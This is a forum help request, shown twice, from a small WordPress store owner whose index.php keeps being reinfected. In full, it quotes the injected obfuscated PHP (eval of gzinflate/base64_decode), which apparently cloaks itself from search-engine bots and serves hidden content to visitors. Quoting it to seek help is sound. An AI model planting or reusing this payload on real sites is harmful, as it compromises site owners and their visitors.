SoCalGaming
Member
Hi everyone,
I'm new here! Well long story short, I run a small online store hosted by GoDaddy using wordpress. My site got hacked and I have no idea what to do. :[ If anyone knows how to fix the root of this problem, please let me know. I really need help here! (And yes, if it's something that takes work I can even offer some cash).
Domain: www.socalgaming.com
Description of problem:
When I went to check out the files on the server, I noticed the index.php file had been edited, and the following script was placed in the file:
<?php eval(gzinflate(base64_decode('AFAGr/lpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0xOw0KCQllcnJvcl9yZXBvcnRpbmcoMCk7DQoJCWlmKCFwcmVnX21hdGNoKCcjYm90fHNwaWRlcnxjcmF3bHxzbHVycHx5YW5kZXgjaScsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpew0KCQlwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlCeEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaUdBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZIaDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3L2svUHl6ajg3cmFuRkNIODJ6anc2TDg2MmR2WjNQUHR0NXQ3dHo1L3o4azg4K3F2RlZOY3MvT2x4Kzl0SGUvVi80Qy9jKy9ZVy9jSGR2bC83WmZmZ0xmK0grd1MvOGhmY2Y0QS8rK0FDL1VhUGRlL3Y0RTcvdDRqTis2ZDY5WC9nTFA5M0RYenY0L0lGK2RIRGZObjFnbXNwdjNHSlAvem5nWHdCc2gxOUhCOERnSWI5NXozOFRDTjNuanhuMEEvMTQ5eDQrLzFRUjNpRlFuektRSGYxa24zN1pleWdqN0k5MDk1N3QxbzNybnI2TC96LzROSHg5ZDM5UDZLTWt3SnM4R3VDeXp4RHBIMEF3blhsRXNDUzlGNHpNMGVSVGZINlBTUTBNR1UxdWF3bEFnQjg4TUY4TmpZRHhFeHJ6bDUvS1MvZDU2UGlFWVhJRGpPM0J2aENOZTVjcFozQThyUHY2SjgveDBKZUtya1VITENOTVllakovVW9IYU1YRFpnb0NwTXdZTitWaGhkUmh3aGhjQlgvR21udGpYSGExS1FiNVlFZitmOTlONXdCTXRQNzBRRnJLelBGdzdEaGxrZ0JPRzMycXFJS09UR0xic2I3MTBIekc0SWZlc3N3dmpMOW5CbStuU0FiRkRYYk5iN3YyTTBkK0MrTUJmMlE1Um9qTFkrVU9NUDFXa0dWR0xGeGhBdjdIY0NKRDI3WC8zSE5mTW1QZU0vOHd4UzFEeUdRZTZKZk1VdFQ4Z1gxRklCaHUwNjh3M0FjNmRHWU9HZXZBckdIR0lRRDNEK1J0WDhwMjkzYzdId2lVZlF1QUtkc2ZyVXprcG03NU05WXczQ0FtM3N3NS9CYmFpbnA0S0w5Z2VQTEJlNmdBMGJadUxwMldPYmlOYXJXcWN1TzRlRWhtRHRIb1V6TUFmV1hQNkdmK2g3L2NzVUFacFFBdmhzZEQyelgvWUJ6NDZOTWQvZXBIMnNmQTlMV1BZV2pHampzYjBoSHlKUS9jNkJsRndINjI1NzVsT2dNcjdXZXpqbUJodkQwV1FnOHpISzlINmNSQXRYM2ZVcU84THhaV0RzUVk3cmtlb1dUd004TGZsakx1ZmZuU2NnMyt1UVdnRHhRVUo2Tk9KZXpJbDBaa1B2VVFHT0FUNTNTNXNmR1hicllqZExZNndySkR4SWpkaE1rSE9Ub2lpNWFDVnJxRkk2MEU3VmxBR05DQm5ib2RKMW1FeFVQTFh2Wk5TMmY1R0xBRUtaMVgxdWM3RDJSVXV6c1BEVm9NOHFGOXhlS0FJWEQzVG95a0wvUmpWTXFBY2ZwbzNLektvdDM2NkJmK3dvL3VITTQvMnp0c1B2dUlYZlBGbmZPcTNpbysyemtzdGovZHUvKzc0cGZQZGo4cDd2eml0NThWYUNBTy9uaFdUZGVMZk5uZWFUNzU3SFZiRjh1TDc1MmZmMzlyK2IzaSs5dnc3ejhwZnZmNW5UdUh2K1FIbnpYaThlOSt4aTcvN3AzOGN1c0g5TVhqdXhxQi9EOEJBQUQvL3c9PScpKSk7DQoJCX0NCn0NCgEAAP//')));?>
I erased this script, re-uploaded the file, and the site was restored to how it was before. I changed the GoDaddy account password and the FTP account password to avoid this happening again. However, within 24 hours of this, the site was crashed again and the same script had been placed in the index.php file.
So yeah, obviously not sure what to do or how to find the problem. If anyone knows anything, or wants to help and possibly earn some cash, please let me know!
Thanks,
Chris G
SoCalGaming
christiang@yahoo.com
I'm new here! Well long story short, I run a small online store hosted by GoDaddy using wordpress. My site got hacked and I have no idea what to do. :[ If anyone knows how to fix the root of this problem, please let me know. I really need help here! (And yes, if it's something that takes work I can even offer some cash).
Domain: www.socalgaming.com
Description of problem:
When I went to check out the files on the server, I noticed the index.php file had been edited, and the following script was placed in the file:
<?php eval(gzinflate(base64_decode('AFAGr/lpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0xOw0KCQllcnJvcl9yZXBvcnRpbmcoMCk7DQoJCWlmKCFwcmVnX21hdGNoKCcjYm90fHNwaWRlcnxjcmF3bHxzbHVycHx5YW5kZXgjaScsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpew0KCQlwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlCeEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaUdBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZIaDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3L2svUHl6ajg3cmFuRkNIODJ6anc2TDg2MmR2WjNQUHR0NXQ3dHo1L3o4azg4K3F2RlZOY3MvT2x4Kzl0SGUvVi80Qy9jKy9ZVy9jSGR2bC83WmZmZ0xmK0grd1MvOGhmY2Y0QS8rK0FDL1VhUGRlL3Y0RTcvdDRqTis2ZDY5WC9nTFA5M0RYenY0L0lGK2RIRGZObjFnbXNwdjNHSlAvem5nWHdCc2gxOUhCOERnSWI5NXozOFRDTjNuanhuMEEvMTQ5eDQrLzFRUjNpRlFuektRSGYxa24zN1pleWdqN0k5MDk1N3QxbzNybnI2TC96LzROSHg5ZDM5UDZLTWt3SnM4R3VDeXp4RHBIMEF3blhsRXNDUzlGNHpNMGVSVGZINlBTUTBNR1UxdWF3bEFnQjg4TUY4TmpZRHhFeHJ6bDUvS1MvZDU2UGlFWVhJRGpPM0J2aENOZTVjcFozQThyUHY2SjgveDBKZUtya1VITENOTVllakovVW9IYU1YRFpnb0NwTXdZTitWaGhkUmh3aGhjQlgvR21udGpYSGExS1FiNVlFZitmOTlONXdCTXRQNzBRRnJLelBGdzdEaGxrZ0JPRzMycXFJS09UR0xic2I3MTBIekc0SWZlc3N3dmpMOW5CbStuU0FiRkRYYk5iN3YyTTBkK0MrTUJmMlE1Um9qTFkrVU9NUDFXa0dWR0xGeGhBdjdIY0NKRDI3WC8zSE5mTW1QZU0vOHd4UzFEeUdRZTZKZk1VdFQ4Z1gxRklCaHUwNjh3M0FjNmRHWU9HZXZBckdIR0lRRDNEK1J0WDhwMjkzYzdId2lVZlF1QUtkc2ZyVXprcG03NU05WXczQ0FtM3N3NS9CYmFpbnA0S0w5Z2VQTEJlNmdBMGJadUxwMldPYmlOYXJXcWN1TzRlRWhtRHRIb1V6TUFmV1hQNkdmK2g3L2NzVUFacFFBdmhzZEQyelgvWUJ6NDZOTWQvZXBIMnNmQTlMV1BZV2pHampzYjBoSHlKUS9jNkJsRndINjI1NzVsT2dNcjdXZXpqbUJodkQwV1FnOHpISzlINmNSQXRYM2ZVcU84THhaV0RzUVk3cmtlb1dUd004TGZsakx1ZmZuU2NnMyt1UVdnRHhRVUo2Tk9KZXpJbDBaa1B2VVFHT0FUNTNTNXNmR1hicllqZExZNndySkR4SWpkaE1rSE9Ub2lpNWFDVnJxRkk2MEU3VmxBR05DQm5ib2RKMW1FeFVQTFh2Wk5TMmY1R0xBRUtaMVgxdWM3RDJSVXV6c1BEVm9NOHFGOXhlS0FJWEQzVG95a0wvUmpWTXFBY2ZwbzNLektvdDM2NkJmK3dvL3VITTQvMnp0c1B2dUlYZlBGbmZPcTNpbysyemtzdGovZHUvKzc0cGZQZGo4cDd2eml0NThWYUNBTy9uaFdUZGVMZk5uZWFUNzU3SFZiRjh1TDc1MmZmMzlyK2IzaSs5dnc3ejhwZnZmNW5UdUh2K1FIbnpYaThlOSt4aTcvN3AzOGN1c0g5TVhqdXhxQi9EOEJBQUQvL3c9PScpKSk7DQoJCX0NCn0NCgEAAP//')));?>
I erased this script, re-uploaded the file, and the site was restored to how it was before. I changed the GoDaddy account password and the FTP account password to avoid this happening again. However, within 24 hours of this, the site was crashed again and the same script had been placed in the index.php file.
So yeah, obviously not sure what to do or how to find the problem. If anyone knows anything, or wants to help and possibly earn some cash, please let me know!
Thanks,
Chris G
SoCalGaming
christiang@yahoo.com
Last edited: